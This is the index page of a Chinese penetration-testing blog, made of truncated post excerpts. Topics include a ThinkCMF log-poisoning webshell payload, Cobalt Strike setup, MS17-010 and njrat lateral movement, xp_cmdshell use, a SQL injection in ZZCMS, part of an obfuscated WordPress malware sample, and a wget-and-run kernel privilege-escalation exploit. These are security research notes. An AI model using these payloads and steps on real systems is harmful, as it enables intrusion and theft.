Sp4ce's Blog

前一阵子接到个项目，目标站是thinkCMF2.X搭建的，试过网上很多方法无法拿下，本地搭了个环境测试了下，最终成功拿下 由于thinkcmf2.x使用了thinkphp3.x作为开发框架，默认情况下启用了报错日志并且开启了模板缓存，导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中，再次包含该日志文件即可在网站根目录下生成一句话木马m.php 日志文件格式为YY_MM_DD.log，如当前日期为2019年12月12日，日志文件为19_12_12.log，完整路径为data/runtime/Logs/Portal/19_12_12.log 测试成功的环境Linux 宝塔[PHP7.2] Windwos PHPstudy PHP7.1 Payload1：首先访问http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22]) ...

记录下Cobalt Strike Teamserer的搭建 环境如下 Ubuntu 18.04 Cobalt Strike 3.14 准备一台Ubuntu 18.04的服务器，下载Cobalt Strike完整文件并传到服务器上 安装JDK1.8 apt install openjdk-8-jdk -y 装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证 启动成功 添加服务vi /etc/systemd/system/cobaltstrike.service [Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_co ...

在对内网进行ms17-010扫描时，发现2台之前没有出现过且没有打补丁的主机，于是，尝试了一波 kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机 尝试打了一波 然后种了个njrat 翻文件的时候发现了点配置文件 down下来解压后发现是交换机的配置文件，于是有了一个大胆的想法 查看了被控主机的网络连接后，发现一个地址无法ping通，TCP包也无法到达，推测做了ACL 于是在被控机上搭了earthworm做转发 本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口 被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口 然后开启proxifier的代理功能，成功访问了那个系统，但这不是主要目的 在咨询了好哥们后，他建议尝试搞搞交换机看看 在对10.2.66/24网段扫描后发现10.2.66.254开放了80和23端口，尝试xshell连接 成功使用huawei密码[email protected]连接，继续翻上级路由 发现了10.2.20.1 继续telnet 继续翻 发现10.2.20.58 继续翻，翻到10 ...

在上次拿下了一台内网主机后，将其作为跳板，对192.168/16网段进行了扫描 介绍先上一张内网环境拓扑图 经过扫描后，识别出几个重要资产，并将他们作为目标进行针对性的测试 192.168.122.8192.168.122.11192.168.122.12192.168.122.13192.168.122.15192.168.122.16192.168.122.54192.168.122.60 通过banner和80端口title 识别到的资产如下 192.168.101.3->锐捷交换机 192.168.135.1->锐捷AC控制器，下联5个AP 192.168.122.8->VMware vCenter主机 192.168.122.6-> ESXi主机 内网大杀器MS17-010的扫描结果 攻击路径：10.46.1.16=192.168.122.16->192.168.122.11->192.168.122.15->192.168.122.54->192.168.122.60->192.168.122.8-& ...

在内网中扫描到了几台sa权限的mssql，报备后做了次简单的检测 侦查Navicat连上后查看xp_cdshell是否存在 发现存在的 执行exec master..xp_cmdshell "systeminfo"发现网卡连接了一个192.168/16的内网IP 主机名: WIN-XXXXXOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-001-0001076-84214初始安装日期: 2016/7/29, 17:27:35系统启动时间: 2019 ...

某省HW中遇到的一个环境提权笔记 0x01环境： OS: Windows Server 2012 R2 补丁情况： KB3139914 : MS16-032KB3124280 : MS16-016KB3134228 : MS16-014KB3079904 : MS15-097KB3077657 : MS15-077KB3045171 : MS15-051KB3000061 : MS14-058KB2829361 : MS13-046KB2850851 : MS13-053 EPATHOBJ 0day 限32位KB2707511 : MS12-042 sysret -pidKB2124261 : KB2271195 MS10-065 IIS7KB970483 : MS09-020 IIS6 安全软件：360套装 Webshell: :white_check_mark: 内网 既然有16-032，为了一次成功，本地搭个环境，github上面下载到的ms16-032果不其然被Gank了 那么就需要做免杀了，然而自己做的免杀要么 要么 要么是编译好了跑不起来（vs2019编译的， ...

存储型XSS参考文章https://0x20h.com/p/9812.html SQL注入还是markit()函数，既然没有对URI进行过滤直接写入数据库，那么能不能搞点事情呢？ 先看看这个query函数怎么执行的 可以看到直接带入mysqli_query，那么尝试构造下payload吧 原始SQL语句 insert into zzcms_bad (username,ip,dose,sendtime)values('" . $_COOKIE["UserName"] . "','$userip','$url','" . date('Y-m-d H:i:s') . "') 既然只有$url可控，那么直接构造传入的URI就可以了，先直接让数据库执行sleep()函数 insert into zzcms_bad (username,ip,dose,sendtime)values('test','127.0.0.1','http://www.zzcms2019.cc/user/ask.php?do=modify&page=1&id=1 ...

无意中发现的一处问题 详情因为我电脑安装的flash不是国版的（不是那个某公司二次打包后的）直接安装的adobe官网的导致一些应用无法使用，比如QQ客户端的空间选项卡中的上传图片功能 然后呢，点击时会跳转到aodobe官网 验证猜想，QQ集成了几个web页面，那么如果把aodobe官网重定向呢？ 先获取下访问的域名，这点可以用wireshark抓出来 本地hosts再改下，再架个web服务器 再写个html文件，放置于于/www/go/getflashGeoError/ HTML代码如下 <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title> ...

题目是在Fix It环境拷下来的，写writeup时的环境是自己搭的 有些题目忘记拷贝数据库，各位大佬凑活看吧 题目的GitHub仓库：https://github.com/NS-Sp4ce/2019-Ciscn-Southern-China-Web Web1Break It打开页面如下 按照惯例Ctrl+U看源代码，发现被注释的<!-- <p class="forgot"><a id="iforget" href="forgetpassword.php">Forgot your password?</a></p>--> 字面意思是重置密码的页面，访问试试 由于不知道用户名，抓包随便输入个用户名看看返回的信息 OK，找个用户名字典爆破下 设置下 爆破出admin123这个用户存在 输入后，跳转到下一个页面 4位验证码爆破走起 扔Burpsuite里 设置 走起，然后踩了第一个坑 验证码全部错误，Ctrl+U看了下源代码 哦豁，设置b ...

情报来源该情报来源：https://www.v2ex.com/t/588483 事件跟进随后笔者联系到了几个.cn域名的站长，获取了相关挂马文件、安装的插件和访客日志 简单比对后发现插件耦合度为0，基本排除了插件漏洞的可能性 从其中一个站长获取的挂马文件（名称wp************.php）如下： <?php goto M0cHaak; AfBuVvu: echo "\x61\165\x78\x36\x54\150\145\x69\157\x47\x68\165\x65\121\165\x33"; goto DzfJmKX; XxMXe8C: $CZMkFQn = "\x2e\57{$i_9JllM}\x20\76\40\57\x64\x65\166\x2f\x6e\165\x6c\x6c\40\62\76\x2f\x64\x65\166\x2f\x6e\165\154\154\40\46"; goto b11TDzU; Nd2oZhY: exec("\160\x6b\151\x6c\x6c\40\x2d\146\x20\55\71\x20\x7 ...

记录下CVE-2019-13272复现和注意事项 复现 OS: Ubuntu 18.04 Kernel: 4.18.0-15-generic 步骤 下载CVE-2019-13272POC：https://github.com/bcoles/kernel-exploits/blob/master/CVE-2019-13272/poc.c wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c 编译gcc -s poc.c -o test 赋予权限chmod +x test 运行./test 复现结束 坑既然能在桌面环境下提权，那在ssh下是否能提权呢？ 继续验证 λ ssh [email protected] authenticity of host '10.2.2.133 (10.2.2.133)' can't be established.ECDSA key fingerprint is SHA256:w8v ...

记录下Apache Logs Viewer的破解笔记 拿到软件先查壳，发现是.net的，混淆过 de4dot去混淆后 打开看看限制的功能和输入注册码那提示什么 随便输个，看看报错 关键词unlock code 去混淆后的软件载入dnspy，全局搜下看看 搜到了2个主窗体的，直接看unlockCodeToolStripMenuItem_Click方法 // Token: 0x060001E4 RID: 484 RVA: 0x0001E230 File Offset: 0x0001C430 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; &# ...